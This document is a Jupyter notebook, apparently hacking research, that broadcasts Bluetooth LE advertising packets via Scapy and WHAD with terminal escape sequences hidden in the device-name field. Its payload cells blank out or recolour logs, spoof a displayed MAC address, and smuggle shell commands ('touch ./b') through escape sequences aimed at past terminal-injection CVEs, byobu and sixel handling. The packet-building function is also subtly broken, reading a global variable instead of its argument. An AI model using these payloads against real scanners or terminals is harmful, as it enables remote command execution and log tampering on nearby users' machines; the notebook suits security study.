# Send BLE ADV Packets from Scapy over WHAD
Brief overview of what this all does

### Name Drops:
* David Leadbeater - DC31 - termaly pwned
* Damien Cauquil - DC32 - WHAD (Radiobit DC25)
* HD - Some terminal paper in 2003

### Imports
The biggest gotcha here are the BT imports. WHAD does not do these imports from the CLI `winject` tool which makes packet sends from Scapy fail.

In [ ]:
from scapy import *
from scapy.layers.bluetooth4LE import BTLE_RF, BTLE, BTLE_ADV, BTLE_DATA, BTLE_ADV_IND, EIR_Hdr
from scapy.layers.bluetooth import EIR_Flags, EIR_CompleteLocalName
from whad.ble.connector.injector import Injector
from whad.device import WhadDevice
from whad.cli.ui import display_packet
from whad.ble import BLE
import random
import time

### Device Setup
This was a PITA to figure out.  In short, a device goes in a connector. A connector goes in an injector. Packets can then be sent from the injector object. The channel is set to 37 by default in the connector.

In [ ]:
dev = WhadDevice.create('uart0')
connector = BLE(dev)
injector = Injector(dev, connection=connector)

In [ ]:
def create_address():
    address = []
    for i in range(6):
        address.append(random.randint(0,255))
    return bytes(address)

In [ ]:
def create_packet(payload, randomize_address=False, address='ff:ff:ff:ff:ff:ff'):
    payload_len = len(bytes(i,'utf-8'))+2
    adv_len = payload_len+9
    address = create_address()
    pkt = BTLE(access_addr=0x8e89bed6) / BTLE_ADV(
        RxAdd=0x00,TxAdd=0x01,ChSel=0,RFU=0,
        PDU_type=0x00,Length=adv_len) / BTLE_ADV_IND(                                         #Set adv length
        AdvA=address, data=[                                                                  #Set address
            EIR_Hdr(len=2,type='flags') / EIR_Flags(flags=0x1a), 
            EIR_Hdr(len=payload_len, type=0x09) / EIR_CompleteLocalName(local_name=payload)]) #Set payload and payload len
    return pkt

In [ ]:
# color logs blue
data = ["\033[36mBLE Pkts should b Blue"]

In [ ]:
# black out logs
data = ["Goodbye logs..\033[30m"]

In [ ]:
# color reset
data = ["\033[0mBack to Norm"]

In [ ]:
# change title
#data = ["\033]2;8====D💦\033\\"]
data = ["\033]2;💉💉💉💉💉\033\\"]

In [ ]:
# rewrite mac address
data = ["\rXX:YY:ZZ:SS:KK:VV FakeMAC"]

In [ ]:
# Normal old data
data = ["Normal",
       "old",
       "bluetooth",
       "device",
       "data"]

In [ ]:
# rando emojis
data = ["🌮🌮🌮🌮🌮"]

In [ ]:
# 28 bytes is the longest payload I can create
data = ["12345678901234567890123456"]

In [ ]:
# test past escape injection CVEs
data = [
    "\x1b]0;touch ./b\a\x1b[21t",
    "\x1bP$q;touch ./b\x1b\\",
    "\x1bP+qfoo;\ntouch ./b;aa\n\x1b\\",
    "\x1b]50;$(touch ./b)\a\x1b]50;?\a",
    "\x1b]0;\rtouch ./b\r\a\x1b[21t",
    "\x1bP$q;touch ./b\n\x1b\\\n\x1bP$qm\x1b\\",
]

In [ ]:
# byobu test
data = ["\x1bP$q;ls\n\x1b\\\n\x1bP$qm\x1b\\"] #output
data = ["\x1bP$q;ls\n\x1b\\"] # no output - seems to be used to input data
data = ["\x1bP$qm;ls\x1b\\"] # output of SIXEL IMAGE (1x1)

In [ ]:
#query title
data = ["\x1b[0\x1b\\"]

In [ ]:
#query font
data = [
    "\x1b[50;?\x1b\\",
    "\x1b[50;?\a\\",
    "\x1b[50;?^G\\",
]

In [ ]:
#query sixel
data = ["\x1bP?qm\x1b\\"]
data = ["\x1bP?q;lsb\n\x1b\\\n\x1bP?qm\x1b\\"]

In [ ]:
for i in data:
    pkt = create_packet(i)
    display_packet(pkt)
    for j in range(10):
        injector.raw_inject(pkt)
        time.sleep(0.3)

### Cleanup
Order matters. Close it all out so the devices are released and reusable by other applications or CLI calls

In [ ]:
injector.close()
connector.close()
dev.close()

In [ ]:
dev.is_open()